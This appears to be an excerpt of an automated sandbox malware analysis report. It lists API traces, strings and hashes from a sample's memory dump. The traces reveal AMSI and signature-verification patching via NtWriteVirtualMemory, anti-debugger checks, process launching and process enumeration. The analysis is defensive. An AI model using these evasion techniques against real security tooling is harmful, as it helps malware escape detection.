LoadLibraryW.KERNEL32(?,?), ref: 02CB87AC
GetProcAddress.KERNEL32(02D01390,BCryptVerifySignature), ref: 02CB87C6
FreeLibrary.KERNEL32(02D01390,02D01390,BCryptVerifySignature,bcrypt,?,02D013D0,00000000,02D013A4,02CBA3BF,ScanString,02D013A4,02CBA774,ScanBuffer,02D013A4,02CBA774,Initialize), ref: 02CB8802

Part of subcall function 02CB7CF8: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02CB7D6C

Strings

BCryptVerifySignature, xrefs: 02CB87BF
bcrypt, xrefs: 02CB87AB

Memory Dump Source

Source File: 00000004.00000002.1839275438.0000000002CA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ca1000_Pumyophn.jbxd

Similarity

API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
String ID: BCryptVerifySignature$bcrypt
API String ID: 1002360270-4067648912
Opcode ID: 2a470ddd186ba8fc9f21b2c433f826bb0a07070bdfbca35d16fe711a640a475f
Instruction ID: 7d72bfe8cf37ea5a0c86d3e66a4ab2a8e38e28c9d7062cd50bb035a08b7eae61
Opcode Fuzzy Hash: 2a470ddd186ba8fc9f21b2c433f826bb0a07070bdfbca35d16fe711a640a475f
Instruction Fuzzy Hash: FCF0C871A803149EEF10ABA9A8C8FB6379CD781359F040929B19C97B64C7F1CC148B60

Function 02CB8704 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 35
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNEL32(amsi), ref: 02CB870D

Part of subcall function 02CB80C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02CB8113
Part of subcall function 02CB80C0: GetProcAddress.KERNEL32(?,?), ref: 02CB8125

Part of subcall function 02CB7CF8: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02CB7D6C

FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02CB876C

Strings

amsi, xrefs: 02CB8708
DllGetClassObject, xrefs: 02CB8732
W, xrefs: 02CB8719

Memory Dump Source

Source File: 00000004.00000002.1839275438.0000000002CA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ca1000_Pumyophn.jbxd

Similarity

API ID: AddressLibraryProc$FreeLoadMemoryVirtualWrite
String ID: DllGetClassObject$W$amsi
API String ID: 2980007069-2671292670
Opcode ID: bb040d4c6b0351af3c6deaaa4092c142f64e20636a256e4cc6c450b3c02565e0
Instruction ID: ada798339588065521b10aa88936bdd43fce570120df715bd42eea249d2c3ef2
Opcode Fuzzy Hash: bb040d4c6b0351af3c6deaaa4092c142f64e20636a256e4cc6c450b3c02565e0
Instruction Fuzzy Hash: 1CF0C85144C381B9E602E678CC45F8BBFCD4F92228F048B5CB5F85A2D2D679D1049BB7

Function 02CBEBE8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 28
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(KernelBase), ref: 02CBEBF8
GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 02CBEC0A
CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02CBEC21

Strings

KernelBase, xrefs: 02CBEBF3
CheckRemoteDebuggerPresent, xrefs: 02CBEC04

Memory Dump Source

Source File: 00000004.00000002.1839275438.0000000002CA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ca1000_Pumyophn.jbxd

Similarity

API ID: AddressCheckDebuggerHandleModulePresentProcRemote
String ID: CheckRemoteDebuggerPresent$KernelBase
API String ID: 35162468-539270669
Opcode ID: 9b049c7cc1318c58b5b517492fa9e12b5000347c39888a4d4a8a376cbb218c17
Instruction ID: 5b385d8423f4aa7f0f4b30c0d9616bc0afee948f4c03d59ed6d8cf79d013e85f
Opcode Fuzzy Hash: 9b049c7cc1318c58b5b517492fa9e12b5000347c39888a4d4a8a376cbb218c17
Instruction Fuzzy Hash: CFF0A03090464CAEEB13A6A888897DDFBAD9F0572AFA80794A435B21C1E7715780C655

Function 02CA1A8F Relevance: 7.7, APIs: 6, Instructions: 173
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000000), ref: 02CA1B17
Sleep.KERNEL32(0000000A,00000000), ref: 02CA1B31

Memory Dump Source

Source File: 00000004.00000002.1839275438.0000000002CA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ca1000_Pumyophn.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 5bc9e7d0c38f7cb370987119e92a3703bfa8e30315ec040dadfaa1d7b74e518e
Instruction ID: e1821af208253caadb8298c53d201a967f6ea9e27b9d50a50a0504e063ceb8e8
Opcode Fuzzy Hash: 5bc9e7d0c38f7cb370987119e92a3703bfa8e30315ec040dadfaa1d7b74e518e
Instruction Fuzzy Hash: 345100B16013428FE715CF6CD9A4756BBD0AB8531CF1C82AED548CB292E7F0D945CBA1

Function 02CB85D4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02CB8018: GetModuleHandleA.KERNELBASE(?), ref: 02CB806A

Part of subcall function 02CB80C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02CB8113
Part of subcall function 02CB80C0: GetProcAddress.KERNEL32(?,?), ref: 02CB8125

CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02CB8660

Strings

CreateProcessAsUserW, xrefs: 02CB85ED
Kernel32, xrefs: 02CB861F

Memory Dump Source

Source File: 00000004.00000002.1839275438.0000000002CA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ca1000_Pumyophn.jbxd

Similarity

API ID: AddressProc$CreateHandleModuleProcessUser
String ID: CreateProcessAsUserW$Kernel32
API String ID: 952078031-2353454454
Opcode ID: 0876e75a713e70b8efe0a79b94cb4970c292efc24903ce05c5e4d354bf17132d
Instruction ID: 10628572c9e8a389da688f54e51f64a76f9dfd654ea11540886c082f280ce8b9
Opcode Fuzzy Hash: 0876e75a713e70b8efe0a79b94cb4970c292efc24903ce05c5e4d354bf17132d
Instruction Fuzzy Hash: D0111EB6640208AFEB51EFA8DC91FDA37EDEB0C700F514620BA08E3640C674ED109B60

Function 02CB8406 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02CB8018: GetModuleHandleA.KERNELBASE(?), ref: 02CB806A

Part of subcall function 02CB80C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02CB8113
Part of subcall function 02CB80C0: GetProcAddress.KERNEL32(?,?), ref: 02CB8125

WinExec.KERNEL32(?,?), ref: 02CB8470

Strings

Kernel32, xrefs: 02CB8453
WinExec, xrefs: 02CB8421

Memory Dump Source

Source File: 00000004.00000002.1839275438.0000000002CA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ca1000_Pumyophn.jbxd

Similarity

API ID: AddressProc$ExecHandleModule
String ID: Kernel32$WinExec
API String ID: 3402293670-3609268280
Opcode ID: 2ddaed76253f01233ec0f3857892a3a52926c1e702f90ded750cc329d77797a5
Instruction ID: 7641b1b0d9b8ef0352b0cf19c846314ee202893fde5e81e4818f4e6065548226
Opcode Fuzzy Hash: 2ddaed76253f01233ec0f3857892a3a52926c1e702f90ded750cc329d77797a5
Instruction Fuzzy Hash: 7401FF38644208BFEB12EFA4EC61F9A77EEEB48B00F618530B504D7A40D674ED00AF20

Function 02CB8408 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45processCOMMON

Download Yara Rule

APIs

Part of subcall function 02CB8018: GetModuleHandleA.KERNELBASE(?), ref: 02CB806A

Part of subcall function 02CB80C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02CB8113
Part of subcall function 02CB80C0: GetProcAddress.KERNEL32(?,?), ref: 02CB8125

WinExec.KERNEL32(?,?), ref: 02CB8470

Strings

Kernel32, xrefs: 02CB8453
WinExec, xrefs: 02CB8421

Memory Dump Source

Source File: 00000004.00000002.1839275438.0000000002CA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ca1000_Pumyophn.jbxd

Similarity

API ID: AddressProc$ExecHandleModule
String ID: Kernel32$WinExec
API String ID: 3402293670-3609268280
Opcode ID: 6bbf7e255ad3ca02d229da36104f87ff44f08f453a6d5a7630cc9a1e8d8d242e
Instruction ID: 68f86d108605189d9fb4394e4176b5c1858fa7e4dc77d734d12e493b8f170b8e
Opcode Fuzzy Hash: 6bbf7e255ad3ca02d229da36104f87ff44f08f453a6d5a7630cc9a1e8d8d242e
Instruction Fuzzy Hash: 90F0FF38644208BFEB12EFA4EC61F8A77EEEB48B00F618520B504D7A40C674ED00AF20

Function 02CB881C Relevance: 4.6, APIs: 3, Instructions: 65libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02CB8903), ref: 02CB8860
GetProcAddress.KERNEL32(02D01384,00000000), ref: 02CB8879

Part of subcall function 02CB7CF8: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02CB7D6C

FreeLibrary.KERNEL32(02D01384,00000000,02D01388,Function_000055D8,00000004,02D01398,02D01388,000186A3,00000040,02D0139C,02D01384,00000000,00000000,00000000,00000000,02CB8903), ref: 02CB88E3

Memory Dump Source

Source File: 00000004.00000002.1839275438.0000000002CA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ca1000_Pumyophn.jbxd

Similarity

API ID: AddressFreeHandleLibraryMemoryModuleProcVirtualWrite
String ID:
API String ID: 3588955079-0
Opcode ID: cf089ef4489eb3a40441fefad3c71e62bc10d8f46ed1696603d337b61dcfc282
Instruction ID: 86abbc20ce6df10592002ddf4deff58cdb29376671d2934bcea45dbb3b531fb2
Opcode Fuzzy Hash: cf089ef4489eb3a40441fefad3c71e62bc10d8f46ed1696603d337b61dcfc282
Instruction Fuzzy Hash: D1114C70A40305ABEF14FBF8DCA6B5E77AEEB45704F900464B548A7B90DAB4DD10AB14

Function 02CA4168 Relevance: 3.1, APIs: 2, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1839275438.0000000002CA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ca1000_Pumyophn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37bf4f3d810a79a46bbb0bca0b2c1ea091c767f3b37214b5f088f5b530a2e7d3
Instruction ID: 4067a6a23c52c87527bf7274b2f0ba7107eccbedb26cac108d2cf258252927fa
Opcode Fuzzy Hash: 37bf4f3d810a79a46bbb0bca0b2c1ea091c767f3b37214b5f088f5b530a2e7d3
Instruction Fuzzy Hash: 0941B274C01206EFDB78DF28E4A475A3BE1FB8832DF24451ADA098B354C7B4A991DF91

Function 02CA5814 Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(20C11B20,?,00000105), ref: 02CA5832

Part of subcall function 02CA5A78: GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 02CA5A94
Part of subcall function 02CA5A78: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02CA5AB2
Part of subcall function 02CA5A78: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02CA5AD0
Part of subcall function 02CA5A78: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02CA5AEE
Part of subcall function 02CA5A78: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,02CA5B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02CA5B37
Part of subcall function 02CA5A78: RegQueryValueExA.ADVAPI32(?,02CA5CE4,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,02CA5B7D,?,80000001), ref: 02CA5B55
Part of subcall function 02CA5A78: RegCloseKey.ADVAPI32(?,02CA5B84,00000000,00000000,00000005,00000000,02CA5B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02CA5B77

Memory Dump Source

Source File: 00000004.00000002.1839275438.0000000002CA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ca1000_Pumyophn.jbxd

Similarity

API ID: Open$FileModuleNameQueryValue$Close
String ID:
API String ID: 2796650324-0
Opcode ID: 8d2262c70beaae2bbfdede8a2f275eb551cfb6ca49d82510be69373b1f735333
Instruction ID: 0be71cca9a6a76437ccf08632772058c60a360cb109e4e63c68fac3ecd96db40
Opcode Fuzzy Hash: 8d2262c70beaae2bbfdede8a2f275eb551cfb6ca49d82510be69373b1f735333
Instruction Fuzzy Hash: C8E06D71A402159FCB10DE5888C0A5637E8AF08798F444565ED58DF34AD3B0DA108BD0

Function 02CA7E34 Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,?,02CC2A41,ScanString,02CFCF00,02CCAFD0,OpenSession,02CFCF00,02CCAFD0,ScanBuffer,02CFCF00,02CCAFD0,OpenSession,02CFCF00,02CCAFD0,Initialize), ref: 02CA7E3F

Memory Dump Source

Source File: 00000004.00000002.1839275438.0000000002CA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ca1000_Pumyophn.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: fe3f8c7547375d3b190e2bd7b8d67a4577ec7d15bc45dec9ccb4955a6e8d04a7
Instruction ID: 73e2ad86cb58a7d71cdddf0f1dc18a820d18f126af47163c272a819246cabb9a
Opcode Fuzzy Hash: fe3f8c7547375d3b190e2bd7b8d67a4577ec7d15bc45dec9ccb4955a6e8d04a7
Instruction Fuzzy Hash: 81C08CA02022060E5E64A2FC0CE450E428C298413C3A42F21E139C61D2D322D86A3410

Function 02CCBB48 Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

timeSetEvent.WINMM(?,00000000), ref: 02CCBB58

Memory Dump Source

Source File: 00000004.00000002.1839275438.0000000002CA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ca1000_Pumyophn.jbxd

Similarity

API ID: Eventtime
String ID:
API String ID: 2982266575-0
Opcode ID: bed6f81a1faa7d7219e899bef8415f9a979ffb26939706184344140ffff5554e
Instruction ID: 7fda44b82a326daae489bb27dfeae1707265ae73cf43226695439d4c7a5d2d71
Opcode Fuzzy Hash: bed6f81a1faa7d7219e899bef8415f9a979ffb26939706184344140ffff5554e
Instruction Fuzzy Hash: 02C092F07C03403EFA10AAE82CE2F23168DD704B08F600416BB00EE2C2D9E25D505A74

Function 02CA4BE4 Relevance: 1.5, APIs: 1, Instructions: 10memoryCOMMON

Download Yara Rule

APIs

SysAllocStringLen.OLEAUT32(00000000,?), ref: 02CA4BEB

Memory Dump Source

Source File: 00000004.00000002.1839275438.0000000002CA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ca1000_Pumyophn.jbxd

Similarity

API ID: AllocString
String ID:
API String ID: 2525500382-0
Opcode ID: db6a3f861f0a6b35b86245416a4c288905a5a0e602f748b147a7570e0d217214
Instruction ID: 18c46d458b248f7e73a1bfafcdb18f12acf630058401932a21babe70613e79e3
Opcode Fuzzy Hash: db6a3f861f0a6b35b86245416a4c288905a5a0e602f748b147a7570e0d217214
Instruction Fuzzy Hash: 33B0922C24960358EA2815621D20B72008C0B9028EF8800919E28C8080EB84C1009832

Function 02CA4BFC Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(00000000), ref: 02CA4C03

Memory Dump Source

Source File: 00000004.00000002.1839275438.0000000002CA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ca1000_Pumyophn.jbxd

Similarity

API ID: FreeString
String ID:
API String ID: 3341692771-0
Opcode ID: 6fc0f88f0b4d12cbeda0546aa3c9b2a61d9b338520cfab902635a24ef7a42f2a
Instruction ID: 7c0b72de8bb262d35f4ce212d69b5346c6b9705d5263714a09e00bede618b6c7
Opcode Fuzzy Hash: 6fc0f88f0b4d12cbeda0546aa3c9b2a61d9b338520cfab902635a24ef7a42f2a
Instruction Fuzzy Hash: BAA022AC000B030A8F2F232C00300AA2033BFE030E3CEC0E800080A0008FBAC200BC30

Function 02CA15CC Relevance: 1.3, APIs: 1, Instructions: 38memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004), ref: 02CA15E2

Memory Dump Source

Source File: 00000004.00000002.1839275438.0000000002CA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ca1000_Pumyophn.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 89ed01fbde9e0efcb1cf80aa0673f13639965c080b30501d2d01d2e4da3ff53b
Instruction ID: 693cf6e41720d8c29ced18239dc941f7bf2f3061b1846615d5d360fa419f72b3
Opcode Fuzzy Hash: 89ed01fbde9e0efcb1cf80aa0673f13639965c080b30501d2d01d2e4da3ff53b
Instruction Fuzzy Hash: C5F06DF0B413014FEB85CF7999543017BD2EB89348F28867AD709DB3A8E7B194018F00

Function 02CA1682 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00101000,00000004), ref: 02CA16A4

Memory Dump Source

Source File: 00000004.00000002.1839275438.0000000002CA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ca1000_Pumyophn.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 30cc41162970da5ede4b6f58472bdf60fb306d759dd5abc5f5b3075793669327
Instruction ID: 69236ca96cb2edaef56a454b2e5ae0433842484dded2d73677d53ad3850bdf6a
Opcode Fuzzy Hash: 30cc41162970da5ede4b6f58472bdf60fb306d759dd5abc5f5b3075793669327
Instruction Fuzzy Hash: 80F090B2A407967BD7119E5A9CC0782BB94FB85315F050139E9489B344D7B4AC108BD4

Function 02CA16E6 Relevance: 1.3, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

VirtualFree.KERNEL32(?,00000000,00008000), ref: 02CA1704

Memory Dump Source

Source File: 00000004.00000002.1839275438.0000000002CA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ca1000_Pumyophn.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 73f9a3b69cf2d174753d76eafdca3396128f5bc4a82218f09c0f077a5ba142bd
Instruction ID: b70b48fac64bcab774115f7ac9b86d0006f37bf632f97a4b37554a0b261ac812
Opcode Fuzzy Hash: 73f9a3b69cf2d174753d76eafdca3396128f5bc4a82218f09c0f077a5ba142bd
Instruction Fuzzy Hash: 9EE08C753003026FE7205A7E4D80B52BBD9EB89778F285A75F659DB2E1D6E0E8008B64

Non-executed Functions

Function 02CA5B83 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 99stringlibrarythreadCOMMON

Download Yara Rule

APIs

lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02CA5B94
GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105), ref: 02CA5BA1
GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105), ref: 02CA5BA7
lstrlen.KERNEL32(00000000), ref: 02CA5BD2
lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 02CA5C19
LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 02CA5C29
lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 02CA5C51
LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 02CA5C61
lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 02CA5C87
LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 02CA5C97

Strings

., xrefs: 02CA5BE4

Memory Dump Source

Source File: 00000004.00000002.1839275438.0000000002CA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ca1000_Pumyophn.jbxd

Similarity

API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
String ID: .
API String ID: 1599918012-248832578
Opcode ID: 08d19139f865e72493333d78b9ee4a31cd30b2ebc972edcdd67ec8a53bfc9ac7
Instruction ID: f52dc86693adb70befaee6a9d480fff564b8ed47817c8c8f4d553ca876470fef
Opcode Fuzzy Hash: 08d19139f865e72493333d78b9ee4a31cd30b2ebc972edcdd67ec8a53bfc9ac7
Instruction Fuzzy Hash: F131A4B1E4021E6AEB35D6B49C55BEE77AD4B443C8F4842E19609E6084DAB4DF448F90

Function 02CBA954 Relevance: 59.6, APIs: 17, Strings: 17, Instructions: 99libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,00000002,02CBABDB,?,?,02CBAC6D,00000000,02CBAD49), ref: 02CBA968
GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 02CBA980
GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 02CBA992
GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 02CBA9A4
GetProcAddress.KERNEL32(00000000,Heap32First), ref: 02CBA9B6
GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 02CBA9C8
GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 02CBA9DA
GetProcAddress.KERNEL32(00000000,Process32First), ref: 02CBA9EC
GetProcAddress.KERNEL32(00000000,Process32Next), ref: 02CBA9FE
GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 02CBAA10
GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 02CBAA22
GetProcAddress.KERNEL32(00000000,Thread32First), ref: 02CBAA34
GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 02CBAA46
GetProcAddress.KERNEL32(00000000,Module32First), ref: 02CBAA58
GetProcAddress.KERNEL32(00000000,Module32Next), ref: 02CBAA6A
GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 02CBAA7C
GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 02CBAA8E

Strings

kernel32.dll, xrefs: 02CBA963
CreateToolhelp32Snapshot, xrefs: 02CBA978
Module32First, xrefs: 02CBAA50
Process32First, xrefs: 02CBA9E4
Process32NextW, xrefs: 02CBAA1A
Module32Next, xrefs: 02CBAA62
Thread32First, xrefs: 02CBAA2C
Heap32ListNext, xrefs: 02CBA99C
Thread32Next, xrefs: 02CBAA3E
Heap32First, xrefs: 02CBA9AE
Module32FirstW, xrefs: 02CBAA74
Process32FirstW, xrefs: 02CBAA08
Heap32ListFirst, xrefs: 02CBA98A
Module32NextW, xrefs: 02CBAA86
Process32Next, xrefs: 02CBA9F6
Toolhelp32ReadProcessMemory, xrefs: 02CBA9D2
Heap32Next, xrefs: 02CBA9C0

Memory Dump Source

Source File: 00000004.00000002.1839275438.0000000002CA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ca1000_Pumyophn.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
API String ID: 667068680-597814768
Opcode ID: 2f3fcac8371c62f59fd3cac130a0bdbb5b035469e531415e6e58ce5a82a9e2d7
Instruction ID: 74116cb8007d593f81b19b72f062e43b2a7f9d322a2574ea9c960481758ec6f0
Opcode Fuzzy Hash: 2f3fcac8371c62f59fd3cac130a0bdbb5b035469e531415e6e58ce5a82a9e2d7
Instruction Fuzzy Hash: C531CAB0A80321AFEF02EFB8D9D9B6A37ADEF06704B140965B456CF218D774D8109F91

Function 02CB6E58 Relevance: 24.5, APIs: 7, Strings: 7, Instructions: 32libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(ole32.dll), ref: 02CB6E5E
GetProcAddress.KERNEL32(00000000,CoCreateInstanceEx), ref: 02CB6E6F
GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 02CB6E7F
GetProcAddress.KERNEL32(00000000,CoAddRefServerProcess), ref: 02CB6E8F
GetProcAddress.KERNEL32(00000000,CoReleaseServerProcess), ref: 02CB6E9F
GetProcAddress.KERNEL32(00000000,CoResumeClassObjects), ref: 02CB6EAF
GetProcAddress.KERNEL32(00000000,CoSuspendClassObjects), ref: 02CB6EBF

Strings

ole32.dll, xrefs: 02CB6E59
CoSuspendClassObjects, xrefs: 02CB6EB9
CoResumeClassObjects, xrefs: 02CB6EA9
CoCreateInstanceEx, xrefs: 02CB6E69
CoReleaseServerProcess, xrefs: 02CB6E99
CoAddRefServerProcess, xrefs: 02CB6E89
CoInitializeEx, xrefs: 02CB6E79

Memory Dump Source

Source File: 00000004.00000002.1839275438.0000000002CA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ca1000_Pumyophn.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: CoAddRefServerProcess$CoCreateInstanceEx$CoInitializeEx$CoReleaseServerProcess$CoResumeClassObjects$CoSuspendClassObjects$ole32.dll
API String ID: 667068680-2233174745
Opcode ID: 1b0358d353835055be3e30d5170483b15d869b7ed9063b0c15fd98fa58600830
Instruction ID: b64b06a35db0e265efb6907ba994ac4041e33aeea348d7d8d1a2e96fa55f3697
Opcode Fuzzy Hash: 1b0358d353835055be3e30d5170483b15d869b7ed9063b0c15fd98fa58600830
Instruction Fuzzy Hash: 57F030F5EC83927EBB017F78DD95A672B5DDE00A0CB381A39B41355502DAB5C4105F50

Function 02CA2530 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 254windowCOMMON

Download Yara Rule

APIs

MessageBoxA.USER32(00000000,?,Unexpected Memory Leak,00002010), ref: 02CA28CE

Strings

, xrefs: 02CA2814
Unknown, xrefs: 02CA278C
7, xrefs: 02CA26A1
Unexpected Memory Leak, xrefs: 02CA28C0
The unexpected small block leaks are:, xrefs: 02CA2707
An unexpected memory leak has occurred. , xrefs: 02CA2690
bytes: , xrefs: 02CA275D
The sizes of unexpected leaked medium and large blocks are: , xrefs: 02CA2849
String, xrefs: 02CA27A1

Memory Dump Source

Source File: 00000004.00000002.1839275438.0000000002CA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ca1000_Pumyophn.jbxd

Similarity

API ID: Message
String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
API String ID: 2030045667-32948583
Opcode ID: dfa83fec632fe41dd6c3a2bd626237ec2e6557758161166ba56d14ceb3db1979
Instruction ID: 9d946c229e37bd82d35c64120469bab04f0db2a46c810c3291d411dc6931a92f
